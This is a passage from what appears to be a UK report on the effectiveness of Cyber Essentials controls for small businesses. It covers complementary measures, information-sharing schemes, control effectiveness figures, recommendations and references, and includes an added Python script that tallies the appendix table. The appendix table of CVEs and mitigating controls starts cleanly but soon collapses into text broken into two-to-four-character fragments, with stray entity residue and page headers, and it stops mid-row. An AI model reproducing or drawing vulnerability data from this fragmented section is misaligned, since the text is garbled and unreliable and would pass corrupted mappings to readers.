The 10 Steps to Cyber Security [2] identifies additional security measures that complement the Cyber Essentials Scheme well, delivering additional security through indirect measures such as User Education and Awareness, along with Network and Systems Monitoring. These additional measures would serve to bolster cyber security by fortifying each employee of the SME with the necessary knowledge on safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for larger organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action from more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.

There exist some collective approaches to improving cyber security; a notable example is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful for quickly identifying potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.

An important note to be made is toward the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be holding a high level of scrutiny to their security practice, and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further, and has begun to strengthen its entire supply chain (~600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations, as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.
Cyber Essentials Controls

Of the five current Cyber Essentials controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use for SMEs. The most widely used controls could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewalls. Patch management, by contrast, isn't necessarily understood by individuals as a tool to greatly improve cyber security.

Anti-Malware was useful in mitigating the fewest (10%) vulnerabilities. It is, however, important to note that Anti-Malware is largely the only security tool that may routinely scan the network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence, and as such is vital to an organisation's cyber-safety.
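The percentages above come from the Cyber Controls Applicability table in the appendix. The script below is an added example, not the report's own tooling, that parses rows written in that table's pipe-separated layout and recomputes the same kind of figures: how many of the listed vulnerabilities apply to each network, how the "With CE" outcomes are distributed, and the proportion of rows in which each control contributes to mitigation. The embedded rows are a constructed eight-row subset of the appendix table, so the resulting percentages are for that subset, not the report's 200-vulnerability figures.

```python
import re
from collections import Counter
from typing import Dict, List

# One row of the Cyber Controls Applicability table, pipe-separated:
# CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE | Controls
SME_COLUMNS = ('SME1', 'SME2', 'SME3', 'SME4', 'Idealised')

# Constructed subset: eight rows copied from the appendix table (of 200).
SAMPLE_TABLE = """\
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated | Patch Management & Secure Configuration
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Firmware Management, Anti-Malware
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated | Strong Passwords, Patch Management
"""


def normalise_control(name: str) -> str:
    """'Secure Configuration (Secure Browser)' -> 'Secure Configuration'."""
    return re.sub(r'\s*\(.*?\)\s*', '', name).strip()


def parse_table(text: str) -> List[Dict]:
    """Parse pipe-separated rows; a header line starting 'CVE ' is skipped."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith('CVE '):
            continue
        cells = [c.strip() for c in line.split('|')]
        if len(cells) != 9:
            raise ValueError(f'expected 9 columns: {line!r}')
        # Controls are listed with ',' or '&' as separators in the appendix.
        controls = [normalise_control(c) for c in re.split(r',|&', cells[8]) if c.strip()]
        rows.append({
            'cve': cells[0],
            'applicable': {sme: flag == 'y' for sme, flag in zip(SME_COLUMNS, cells[1:6])},
            'no_ce': cells[6],
            'with_ce': cells[7],
            'controls': controls,
        })
    return rows


def status_counts(rows: List[Dict]) -> Dict[str, int]:
    """Distribution of the 'With CE' outcome over the rows."""
    return dict(Counter(r['with_ce'] for r in rows))


def applicable_counts(rows: List[Dict]) -> Dict[str, int]:
    """How many listed vulnerabilities apply to each network."""
    return {sme: sum(r['applicable'][sme] for r in rows) for sme in SME_COLUMNS}


def control_coverage(rows: List[Dict]) -> Dict[str, float]:
    """Percentage of all rows in which a control contributes to mitigation.
    A control named on a 'Not Mitigated' row (e.g. 'don't install') is not
    counted, since it mitigates nothing in that row."""
    counts = Counter()
    for r in rows:
        if r['with_ce'] == 'Not Mitigated':
            continue
        for control in set(r['controls']):
            counts[control] += 1
    return {control: round(100.0 * n / len(rows), 1) for control, n in counts.items()}


if __name__ == '__main__':
    rows = parse_table(SAMPLE_TABLE)
    print(applicable_counts(rows))
    print(status_counts(rows))
    for control, pct in sorted(control_coverage(rows).items(), key=lambda kv: -kv[1]):
        print(f'{control:<22} {pct:5.1f}%')
```

Feeding the full appendix table into `parse_table` reproduces the report's methodology; the qualifier in parentheses (Secure Browser, User Policy, and so on) is deliberately dropped so that all variants of Secure Configuration are counted as one control, which is how the report's five-control figures are framed.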
Recommendations

To further improve cyber security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental/collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle these other types of attacks mentioned above, which were not within the scope of this report.
References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, and Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, and Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, and Department for Business, Innovation & Skills. Cyber-security information sharing partnership (CiSP). https://www.cert.gov.uk/cisp, March 2013.

[5] CREST. Cyber essentials certified companies. http://www.cyberessentials.org/list, March 2015.

[6] CVE.Mitre.org. Terminology - mitre.org. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, and Department for Business, Innovation & Skills. Common cyber attacks: Reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-‘-cluster, 2015.

[10] HM Government. Cyber essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 aka Shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy: protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.
Cyber Controls Applicability

Columns: CVE; applicability to SME1, SME2, SME3, SME4 and the Idealised network (y/n); outcome with No CE; outcome With CE; the Cyber Essentials controls providing the mitigation.

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE | Controls
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated | User Access (Strong Password), Patch Management
CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated | Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated | Patch Management & Secure Configuration
CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management
CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Firewall
CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration
CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration
CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management
CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management & Firewall
CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated | Firewall, Patch Management
CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install)
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated | Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated | Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated | Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration
CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
